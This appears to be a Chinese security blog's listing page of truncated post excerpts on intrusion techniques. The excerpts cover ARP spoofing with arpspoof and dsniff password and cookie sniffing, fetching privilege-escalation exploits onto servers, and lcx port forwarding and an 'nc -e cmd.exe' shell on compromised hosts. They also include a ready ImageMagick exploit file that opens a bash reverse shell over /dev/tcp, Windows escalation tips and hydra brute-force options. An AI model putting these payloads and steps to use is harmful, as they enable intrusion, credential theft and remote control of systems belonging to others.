woobuntu下内网渗透arp欺骗、监听、常用工具

0x00: 使用工具:fping  安装命令~$sudo apt-get install fping命令行执行:fping –asg xxx.xxx.xxx.xxx/24查看网关命令:netstat -rn/*用来检测内网存活主机*/ 0x01: 这里arpspoof 和ettercap随便选之一使用即可(arpspoof系统已自带)arpspoof -i 网卡名称 -t 路由网关ip 目标ip注:在arpspoof开启arp欺骗的同时,可以使用dsniff(系统自带)来监听嗅探密码woobuntu下使用命令行:sudo dsniff -c -f /usr/share/dsniff/dsniff.services 来开启dsniff的密码嗅探然后为了方便查看,可以使用cookie cadger 来会话劫持,抓取cookie。 0x02: 使用工具:ettercap安装命令 ~$sudo a […]

查看全部


本地提权工具箱

0x01 背景 在我们平时渗透的过程中经常会遇到需要提权的情况,本文将介绍一些方便大家在Windows和Linux进行提权的工具。 0x02 本地提权之Windows 本工具适合在任何Windows服务器上进行已知提权漏洞的检测以及相应的提权EXP下载。 工具地址:https://github.com/brianwrf/WinSystemHelper 使用方法: 1. 拷贝WinSysHelper.bat, explt2003.txt和expgt2003.txt文件至目标Windows服务器上 2. 命令行下运行WinSysHelper.bat执行检测 3. 按照提示下载EXP进行提权 0x03 本地提权之Linux 本工具适合在任何Linux服务器上进行已知提权漏洞的检测以及相应的提权EXP下载。 工具地址: https://github.com/brianwrf/RootHelper […]

查看全部


内网转发姿势

  一、lcx的使用 1.肉鸡上执行:lcx.exe –slave 公网ip +端口  肉鸡ip +端口 例如:lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389 意思是把肉鸡的3389端口转发到xxx.xxx.xxx.xxx公网的10000端口 2.公网ip机器上执行 Lcx.exe –listen 10000 10001 例如:Lcx.exe –listen 10000 10001 意思是监听公网ip机器上的10000端口请求,并将10000的请求传送给本地10001端口。 此时,RDP连接,只需要输入 127.0.0.1:10001,即可远程连接到肉鸡上。 二、nc反弹cmdshell 1.开启肉鸡代理执行cmdshell 在肉鸡上执行 nc -l -p 2333 -t -e cmd.exe 意思是,肉鸡监听本地的2333 […]

查看全部


Linux和windows dos命令比较(不定期更新)

命令说明                           DOS命令              Linux命令 复制文件                             copy                      cp 转移文件                             move                     mv 列举文件                             dir                          ls 清除屏幕                              cls                          clear 关闭Shell                            exit                         exit 显示和设置日期         […]

查看全部


imagemagick 漏洞的利用说明

最近imagemagick 曝光率那么高,但群里问怎么利用的却很多。 这里自己做一个利用笔记,以及容易出现的错误。 对于网络上传播的利用说明,那个方式并没什么问题,但是太绕了。 说个简单的。下列脚本放入 后缀名png即可。(说明:该脚本是通过 bash命令把端口反弹出去,类似win肉鸡上执行了 nc -t -e cmd.exe 你的公网IP 反弹端口)   push graphic-context viewbox 0 0 640 480 fill ‘url(https://example.com/image.jpg”|/bin/bash -i >& /dev/tcp/你的公网IP/反弹端口  0>&1″)’ pop graphic-context   重点是如何利用,这里需要个nc,(百度:ne […]

查看全部


关于windows渗透提权的各种姿势

【 web提权 】 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都可以。 4.cmd命令:systeminfo,看看有没有KB952004、KB956572、KB970483这三个补丁,如果没有,第一个是pr提权,第二个是巴西烤肉提权,第三个是iis6.0提权。 6.c:\windows\temp\cookies\ 这个目录 7.找sa密码或是 […]

查看全部


hydra8.1 最新版使用说明

一、使用过程中参数说明: -R 继续从上一次进度接着破解 -S 大写,采用SSL链接 -s 小写,可通过这个参数指定非默认端口 -l 指定破解的用户,对特定用户破解 -L 指定用户名字典 -p 小写,指定密码破解,少用,一般是采用密码字典 -P 大写,指定密码字典 -e 可选选项,n:空密码试探,s:使用指定用户和密码试探 -C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数 -M 指定目标列表文件一行一条 -o 指定结果输出文件 -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解 -t 同时运行的线程数,默认为16 -w 设置最大超时的时间,单位秒,默认是30s -v / -V 显示详细过程 server 目标ip service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s […]

查看全部